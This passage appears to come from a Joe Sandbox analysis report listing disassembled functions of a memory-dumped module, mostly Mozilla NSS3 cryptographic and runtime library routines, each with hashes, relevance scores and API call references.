Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: K11_$CriticalEnterErrorSectionValue$DeriveFreeUnlockUnwrapWithfreememset
String ID:
API String ID: 324975836-0
Opcode ID: ca2a194be0179c0c499e03f04adc597ab1019f00bbe37d2bfbf386776c999125
Instruction ID: 8f1c8299b2e9274ceaa8b8bdb31ebce21fe16de31c0823e1fb037a3233707891
Opcode Fuzzy Hash: ca2a194be0179c0c499e03f04adc597ab1019f00bbe37d2bfbf386776c999125
Instruction Fuzzy Hash: 5741A3B1A04219DBE710CF19CC40BA9F7F5FF45308F0546AAE90CA7751E331A986CB99

Function 6C76A860 Relevance: 6.1, APIs: 4, Instructions: 111COMMON

Download Yara Rule

APIs

Part of subcall function 6C76A690: calloc.MOZGLUE(00000001,00000044,?,?,?,?,6C76A662), ref: 6C76A69E
Part of subcall function 6C76A690: PR_NewCondVar.NSS3(?), ref: 6C76A6B4

PR_IntervalNow.NSS3 ref: 6C76A8C6
EnterCriticalSection.KERNEL32(?), ref: 6C76A8EB
_PR_MD_UNLOCK.NSS3(?), ref: 6C76A944
PR_SetPollableEvent.NSS3(?), ref: 6C76A94F

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CondCriticalEnterEventIntervalPollableSectioncalloc
String ID:
API String ID: 811965633-0
Opcode ID: 019d5a54a63448dd293a57d6ab67fa5804b93471e14ac5399fa19d4f1c2116a6
Instruction ID: 29076249259467c21242c4c0d6d7afd196dca7a38c5aff19ce078f52be223ec9
Opcode Fuzzy Hash: 019d5a54a63448dd293a57d6ab67fa5804b93471e14ac5399fa19d4f1c2116a6
Instruction Fuzzy Hash: 3D4149B4A01B129FC704CF2AC684956FBF5FF48328725856AE94ACBF11E731E854CB90

Function 6C6C2C80 Relevance: 6.1, APIs: 4, Instructions: 105COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,6C6C1289,?), ref: 6C6C2D72

Part of subcall function 6C6C3390: PORT_ZAlloc_Util.NSS3(00000000,-0000002C,?,6C6C2CA7,E80C76FF,?,6C6C1289,?), ref: 6C6C33E9
Part of subcall function 6C6C3390: PORT_ZAlloc_Util.NSS3(0000001C), ref: 6C6C342E

PK11_FreeSymKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6C1289,?), ref: 6C6C2D61

Part of subcall function 6C6C0B00: SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C6C0B21
Part of subcall function 6C6C0B00: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C6C0B64

PR_SetError.NSS3(FFFFE02D,00000000,?,?,?,?,6C6C1289,?), ref: 6C6C2D88
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C6C1289,?), ref: 6C6C2DAF

Part of subcall function 6C67B8F0: PR_CallOnceWithArg.NSS3(6C7B2178,6C67BCF0,?), ref: 6C67B915
Part of subcall function 6C67B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000001,?), ref: 6C67B933
Part of subcall function 6C67B8F0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,?), ref: 6C67B9C8
Part of subcall function 6C67B8F0: SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C67B9E1

Part of subcall function 6C6C0A50: SECOID_GetAlgorithmTag_Util.NSS3(6C6C2A90,E8571076,?,6C6C2A7C,6C6C21F1,?,?,?,00000000,00000000,?,?,6C6C21DD,00000000), ref: 6C6C0A66

Part of subcall function 6C6C3310: SECOID_GetAlgorithmTag_Util.NSS3(?,00000000,FFFFFFFF,?,6C6C2D1E,?,?,?,?,00000000,?,?,?,?,?,6C6C1289), ref: 6C6C3348

Part of subcall function 6C6C06F0: PORT_ZAlloc_Util.NSS3(0000000C,00000000,?,6C6C2E70,00000000), ref: 6C6C0701

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$AlgorithmAlloc_ErrorK11_Tag_$Item_Tokens$AllocCallFreeOnceWithZfree
String ID:
API String ID: 2288138528-0
Opcode ID: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction ID: a194bdc2ad5bc530108f64ba09ab88197856ac448be755a6a2a0d8a7fc2316e1
Opcode Fuzzy Hash: 8546e08e28100fe682e9ef3c81ee26992161300af297bb711fe42b1ebbdd5512
Instruction Fuzzy Hash: B931CCB6B002016BDB009F64EC44B9A37A5EF5631DF140130ED159B791EB31F529C7AB

Function 6C6C6AE0 Relevance: 6.1, APIs: 4, Instructions: 105threadCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C6C6B3E

Part of subcall function 6C6C6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6C6C8A
Part of subcall function 6C6C6C20: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C6C6C90

Part of subcall function 6C6C7E20: PR_SetError.NSS3(00000000,00000000), ref: 6C6C7E5F

PR_SetError.NSS3(FFFFD07B,00000000), ref: 6C6C6B84
PR_EnterMonitor.NSS3(?), ref: 6C6C6BE0
PR_ExitMonitor.NSS3(?), ref: 6C6C6C01

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ErrorMonitorfree$CurrentEnterExitThread
String ID:
API String ID: 4197271849-0
Opcode ID: f68339bcf6c7e5f03b7e594d904387fe1747aced46fd4b37767413060c497664
Instruction ID: c83267a85afd606fd760517dc143bb604517abee3f6e397cf6f5b862ff4eaef0
Opcode Fuzzy Hash: f68339bcf6c7e5f03b7e594d904387fe1747aced46fd4b37767413060c497664
Instruction Fuzzy Hash: 1F3125B1B0410657D7109A249C85BBF3668CF6532CF080171EC09DBBA2EB31D92AC6AF

Function 6C656C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C656C8D
memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C656CA9
PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6C656CC0
SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6C778FE0), ref: 6C656CFE

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$Alloc_Arena$EncodeItem_memset
String ID:
API String ID: 2370200771-0
Opcode ID: 35fcae7972542499eae4b1461d7506d87938f96bb9edc55976b18e2f36d01e78
Instruction ID: 5634ca65450e1953ecc60d883ca59a0d590e03f3b393b1a9f331f98c01907e5d
Opcode Fuzzy Hash: 35fcae7972542499eae4b1461d7506d87938f96bb9edc55976b18e2f36d01e78
Instruction Fuzzy Hash: 6C318CB1A002169FEB08CF65C891ABFBBF5EF89348B60452DD905E7710EB31D915CBA4

Function 6C764F00 Relevance: 6.1, APIs: 4, Instructions: 101fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,40000000,00000003,00000000,?,?,00000000), ref: 6C764F5D
free.MOZGLUE(?), ref: 6C764F74
free.MOZGLUE(?), ref: 6C764F82
GetLastError.KERNEL32 ref: 6C764F90

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$CreateErrorFileLast
String ID:
API String ID: 17951984-0
Opcode ID: b1d41f80c0e578ece9e30889c05752a404ecb7437a547c40666b4bcbffc8e393
Instruction ID: bd66aa84d210bcda55b9139395168e0b33b97f101d16059c4303d1dafbc349a2
Opcode Fuzzy Hash: b1d41f80c0e578ece9e30889c05752a404ecb7437a547c40666b4bcbffc8e393
Instruction Fuzzy Hash: C3312B75A002095FEB01DFAADD55BDFB3B8FF45358F080235EC15A7B81DB35A9048691

Function 6C6C2880 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6C2896
NSS_CMSEncoder_Finish.NSS3(?), ref: 6C6C2932
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6C294C
free.MOZGLUE(?), ref: 6C6C2955

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Encoder_Finish$Arena_FreeUtilfree
String ID:
API String ID: 508480814-0
Opcode ID: fbcc637e4ffff2eea614ac528d2bd2bcd5c23382fb26edc84eb6d8e13d9825e1
Instruction ID: 196af59f10ea5ddf8b6cde50c94e13c728966e3e41c30443de268ed5cdd9767d
Opcode Fuzzy Hash: fbcc637e4ffff2eea614ac528d2bd2bcd5c23382fb26edc84eb6d8e13d9825e1
Instruction Fuzzy Hash: DF21D6B67006009BE7109B26EC49F5777E5EF85358F040538E84DC7B61FB71E818875A

Function 6C71AAA2 Relevance: 6.1, APIs: 4, Instructions: 85COMMON

Download Yara Rule

APIs

_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C7B0D9C,00000000), ref: 6C71AAD4
_initialize_onexit_table.API-MS-WIN-CRT-RUNTIME-L1-1-0(6C7B0DA8,00000000), ref: 6C71AAE3

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: _initialize_onexit_table
String ID:
API String ID: 2450287516-0
Opcode ID: 6332c8d2877567357af9c1a0f0e496e902a30c522cc52c74e06aa2c34af6f4cb
Instruction ID: 515f730f2227fb61b0c98ebd851350dc0fe75a4ede9c64e0884632bf2dc611f3
Opcode Fuzzy Hash: 6332c8d2877567357af9c1a0f0e496e902a30c522cc52c74e06aa2c34af6f4cb
Instruction Fuzzy Hash: 5321F871D08249AFDF00DF69DB056CE37B6AF02328F184025ED14ABF80D771EA488BA5

Function 6C694FB0 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,00000000,00000000,00000000,?,6C69B60F,00000000), ref: 6C695003
EnterCriticalSection.KERNEL32(?,?,00000000,00000000,00000000,?,6C69B60F,00000000), ref: 6C69501C
PR_Unlock.NSS3(?,?,?,00000000,00000000,00000000,?,6C69B60F,00000000), ref: 6C69504B
free.MOZGLUE(?,00000000,00000000,00000000,?,6C69B60F,00000000), ref: 6C695064

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValuefree
String ID:
API String ID: 1112172411-0
Opcode ID: 095e995494cad1d855c57e68eaf07b84dfb43f7a967a2ca83ba45a4cb9be3774
Instruction ID: 89d850ee75987e8177842cf50450b4f4b27b73f9720fba99185998acb81b7894
Opcode Fuzzy Hash: 095e995494cad1d855c57e68eaf07b84dfb43f7a967a2ca83ba45a4cb9be3774
Instruction Fuzzy Hash: DB3127B0A05606DFDB00EF68C484A6ABBF4FF09345F118669E859D7700E731E890CB95

Function 6C67ABF0 Relevance: 6.1, APIs: 4, Instructions: 74stringCOMMON

Download Yara Rule

APIs

CERT_GetFirstEmailAddress.NSS3(?), ref: 6C67AC0B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C67AC26
PR_Now.NSS3 ref: 6C67AC34
CERT_GetNextEmailAddress.NSS3(?,00000000), ref: 6C67AC6E

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: AddressEmail$FirstNextstrcmp
String ID:
API String ID: 3008928262-0
Opcode ID: fc7e22120cf64e7d2235f96a232bc084c1f64fe903f36a3e182c0f09125b79f8
Instruction ID: bc3a989eece3e2eee44aab919080307fa246be72056c398ccc84a5ca574d2a6a
Opcode Fuzzy Hash: fc7e22120cf64e7d2235f96a232bc084c1f64fe903f36a3e182c0f09125b79f8
Instruction Fuzzy Hash: A911E9B16012057FA7109E699C859AB77E8EF45758B540838FD14C7B02FB20D918C6FA

Function 6C6D0C00 Relevance: 6.1, APIs: 4, Instructions: 73COMMON

Download Yara Rule

APIs

PK11_DigestOp.NSS3(?,?,00000004), ref: 6C6D0C43

Part of subcall function 6C67DEF0: TlsGetValue.KERNEL32 ref: 6C67DF37
Part of subcall function 6C67DEF0: EnterCriticalSection.KERNEL32(?), ref: 6C67DF4B
Part of subcall function 6C67DEF0: PR_SetError.NSS3(00000000,00000000), ref: 6C67E02B
Part of subcall function 6C67DEF0: PR_Unlock.NSS3(?), ref: 6C67E07E

PK11_DigestOp.NSS3(?,?,00000008), ref: 6C6D0C85
PK11_DigestOp.NSS3(?,?,?), ref: 6C6D0C9F
PR_SetError.NSS3(FFFFD07F,00000000), ref: 6C6D0CB4

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: DigestK11_$Error$CriticalEnterSectionUnlockValue
String ID:
API String ID: 3186484790-0
Opcode ID: 2301326e11ad5aa32fbe4a1f9452d838df301873c6a5631696e1aa9fa5c20b9e
Instruction ID: e0272d254e9dad0fafc172a1ff95bffd8e273b10d9a3baca1311e36eb2247f12
Opcode Fuzzy Hash: 2301326e11ad5aa32fbe4a1f9452d838df301873c6a5631696e1aa9fa5c20b9e
Instruction Fuzzy Hash: A121FB715042869FC701CB68AC05F9BBBA4AF65304F0E85A5E8445F752E731D928C7FA

Function 6C6C2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6C6C2E08

Part of subcall function 6C6B14C0: TlsGetValue.KERNEL32 ref: 6C6B14E0
Part of subcall function 6C6B14C0: EnterCriticalSection.KERNEL32 ref: 6C6B14F5
Part of subcall function 6C6B14C0: PR_Unlock.NSS3 ref: 6C6B150D

PORT_NewArena_Util.NSS3(00000400), ref: 6C6C2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6C6C2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C6C2E95

Part of subcall function 6C6B1200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B1228
Part of subcall function 6C6B1200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C6B1238
Part of subcall function 6C6B1200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B124B
Part of subcall function 6C6B1200: PR_CallOnce.NSS3(6C7B2AA4,6C6B12D0,00000000,00000000,00000000,?,6C6588A4,00000000,00000000), ref: 6C6B125D
Part of subcall function 6C6B1200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C6B126F
Part of subcall function 6C6B1200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C6B1280
Part of subcall function 6C6B1200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C6B128E
Part of subcall function 6C6B1200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C6B129A
Part of subcall function 6C6B1200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C6B12A1

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: a51d854b2c2187627cc4bf75380a88774b15328c879bb4e2fa4f2b81387d0eaa
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: F621D4B1E003455BE700CF549D44BAA3764AF9630CF111269DD087B752F7B1E69983AA

Function 6C6E2870 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C6E8915
SECKEY_DestroyPublicKey.NSS3(00000000), ref: 6C6E8920
free.MOZGLUE(?), ref: 6C6E8929
free.MOZGLUE(?,-00000001,?,?,?,6C6D0279,?), ref: 6C6E8942

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Destroyfree$PrivatePublic
String ID:
API String ID: 4267951533-0
Opcode ID: a3a0352a0e2ad24e0f66be75534ca5930bd2433fd67c2c541ef83c7a2dd966b0
Instruction ID: 5560234d54862944148a91ced51193dc0e302aff847dfa80e9fd0bfa9f23fdf9
Opcode Fuzzy Hash: a3a0352a0e2ad24e0f66be75534ca5930bd2433fd67c2c541ef83c7a2dd966b0
Instruction Fuzzy Hash: 9E219275606104DFC704CF4DE889EA637B4FF4A355B1840BAE90D9B721C731A805CB99

Function 6C6569B0 Relevance: 6.1, APIs: 4, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(6C656AB7,0000000C,00000001,00000000,?,?,6C656AB7,?,00000000,?), ref: 6C6569CE

Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B10F3
Part of subcall function 6C6B10C0: EnterCriticalSection.KERNEL32(?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B110C
Part of subcall function 6C6B10C0: PL_ArenaAllocate.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1141
Part of subcall function 6C6B10C0: PR_Unlock.NSS3(?,?,?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B1182
Part of subcall function 6C6B10C0: TlsGetValue.KERNEL32(?,6C658802,00000000,00000008,?,6C64EF74,00000000), ref: 6C6B119C

SEC_ASN1EncodeItem_Util.NSS3(6C656AB7,0000001C,00000004,?,00000001,00000000), ref: 6C656A06
SEC_ASN1EncodeItem_Util.NSS3(6C656AB7,?,00000000,?,00000001,00000000,?,?,6C656AB7,?,00000000,?), ref: 6C656A2D
PR_SetError.NSS3(FFFFE005,00000000,00000001,00000000,?,?,6C656AB7,?,00000000,?), ref: 6C656A42

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Util$ArenaEncodeItem_Value$Alloc_AllocateCriticalEnterErrorSectionUnlock
String ID:
API String ID: 4031546487-0
Opcode ID: 3cb042c495299c68b38dcba74abeb1ae01d76996c54e7c3a9b8deeaaec9b9415
Instruction ID: effd1f442fb92d6db62df528eb1999a92e6e49c6ff3f0ecd17d1d27d5c13a067
Opcode Fuzzy Hash: 3cb042c495299c68b38dcba74abeb1ae01d76996c54e7c3a9b8deeaaec9b9415
Instruction Fuzzy Hash: 871120B5640206AFE710CE66CC80B5273ACEB0131DFA08128EA19C3B05FB70E821C7A8

Function 6C67ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C67ACC2

Part of subcall function 6C652F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C652F0A
Part of subcall function 6C652F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C652F1D

Part of subcall function 6C652AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6C650A1B,00000000), ref: 6C652AF0
Part of subcall function 6C652AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C652B11

